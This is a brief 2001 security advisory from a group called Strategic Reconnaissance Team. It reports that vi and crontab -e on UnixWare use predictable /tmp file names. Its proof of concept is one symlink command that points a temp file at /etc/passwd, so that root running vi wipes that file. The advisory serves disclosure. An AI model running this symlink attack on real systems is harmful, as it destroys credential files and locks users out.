====================================================================== Strategic Reconnaissance Team Security Advisory(SRT2001-9) Topic: vi and crontab -e /tmp issues Vendor: Santa Cruz Operations Release Date: 05/07/01 ====================================================================== .: Description vi makes poor use of /tmp. File names are very predictable .: Impact as a user ln -s /etc/passwd /tmp/Ex04161 wait for root to run vi and viola when he does he will clobber /etc/passwd with a null file .: Workaround don't use vi or crontab -e .: Systems Affected Unixware 5.x .: Proof of Concept ln -s /etc/passwd /tmp/Ex04161 .: Vendor Status A copy of this advisory was mailed to their attention .: Credit Kevin Finisterre [EMAIL PROTECTED] ====================================================================== �Copyright 2001 Secure Network Operations , Inc. All Rights Reserved. Strategic Reconnaissance Team | [EMAIL PROTECTED] http://recon.snosoft.com | http://www.snosoft.com ----------------------------------------------------------------------
